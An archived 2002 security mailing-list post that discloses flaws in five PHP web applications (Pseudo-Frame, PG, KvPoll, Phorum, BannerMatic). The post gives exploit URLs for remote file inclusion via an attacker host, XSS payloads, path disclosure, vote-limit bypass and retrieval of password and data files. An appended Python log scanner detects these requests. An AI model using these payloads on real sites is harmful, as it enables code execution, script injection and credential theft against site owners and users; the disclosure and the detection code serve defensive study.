Vulnerability Development mailing list archives

Security holes : Pseudo-Frame, PG, KvPoll, Phorum, BanMat


From: frog frog <leseulfrog () hotmail com>
Date: 12 May 2002 11:44:26 -0000



Product 1 :
***********
Pseudo Frame 1.0
http://www.clicky-web.net

Problem :
- File inclusion

Exploit :
- http://www.site.com/index.php?page=http://www.haxor.com/file with file.php on http://www.haxor.com

Product 2 :
***********
PG 1.0
http://www.clicky-web.net

Problems :
- XSS
- Path Disclosure

Exploits :
- index.php?picture_n="%20width=0><script>SCRIPT</script><img%20width=0%20src="&gallery_name=path
- index.php?picture_n=image.gif&gallery_name=non-existant-path

Product 3 :
***********
KvPoll 1.1
http://www.killervault.com

Problem :
- Bypass of the protection against multiple votes

Exploit :
- /clear_cookies.php

Product 4 :
***********
Phorum 3.3.2a RC1 
http://phorum.org

Problem :
- XSS

Exploits :
- /read.php?f=1&i=1&t=1"><form%20name=o><input%20name=u%20value=XSS></form><script>alert(document.o.u.value)</script>
- "><script>SCRIPT</script> in a message in the "email" input

Product 5 :
***********
BANNERMATIC V1, V2, V3
http://www.getcruising.com

Problem :
- Information disclosure

Exploits :
- /ban.log
- /ban.bak
- /ban.dat
- /banmat.pwd


frog-m@n
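
Added example, not part of the original post or of any of the products named: a small Python log check that flags requests shaped like the ones listed above (an off-site URL in page=, markup in the query string, direct fetches of the BannerMatic data files, direct hits on clear_cookies.php). The Common Log Format input, the tag names and the sample lines are assumptions made for illustration.

```python
import re
from urllib.parse import urlsplit, parse_qsl, unquote

REQ = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')
REMOTE = re.compile(r'^(?:https?|ftp)://', re.I)      # page= pointing off-site
MARKUP = re.compile(r'<\s*script|["\']\s*>', re.I)    # tag or attribute breakout
DATA_FILES = {"ban.log", "ban.bak", "ban.dat", "banmat.pwd"}

# Constructed sample lines (documentation addresses and hosts, not real traffic).
SAMPLE_LOG = [
    '192.0.2.10 - - [12/May/2002:12:00:01 +0000] "GET /index.php?page=news HTTP/1.0" 200 900',
    '198.51.100.7 - - [12/May/2002:12:00:05 +0000] "GET /index.php?page=http://example.invalid/file HTTP/1.0" 200 120',
    '198.51.100.7 - - [12/May/2002:12:00:09 +0000] "GET /read.php?f=1&i=1&t=1%22%3E%3Cscript%3EX%3C/script%3E HTTP/1.0" 200 300',
    '203.0.113.4 - - [12/May/2002:12:01:00 +0000] "GET /banners/banmat.pwd HTTP/1.0" 200 64',
    '203.0.113.4 - - [12/May/2002:12:01:02 +0000] "GET /poll/clear_cookies.php HTTP/1.0" 200 10',
]

def classify(target):
    """Return the sorted advisory patterns that one request target matches."""
    parts = urlsplit(target)
    hits = set()
    # parse_qsl percent-decodes values, so page=http%3A%2F%2F... is caught too.
    for name, value in parse_qsl(parts.query, keep_blank_values=True):
        if name == "page" and REMOTE.match(value):
            hits.add("remote-include")
    if MARKUP.search(unquote(parts.query)):
        hits.add("markup-in-query")
    leaf = unquote(parts.path).rsplit("/", 1)[-1].lower()
    if leaf in DATA_FILES:
        hits.add("bannermatic-data-file")
    if leaf == "clear_cookies.php":
        hits.add("kvpoll-cookie-reset")   # review hint: direct request to the reset script
    return sorted(hits)

def scan(log_lines):
    """Return (client address, tags) for every log line that matches a pattern."""
    findings = []
    for line in log_lines:
        m = REQ.search(line)
        tags = classify(m.group(1)) if m else []
        if tags:
            findings.append((line.split()[0], tags))
    return findings

if __name__ == "__main__":
    for client, tags in scan(SAMPLE_LOG):
        print(client, ", ".join(tags))
```

A 200 response on any of the data-file paths means the web server is serving them; denying those names in the server configuration closes that item regardless of what the log shows.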


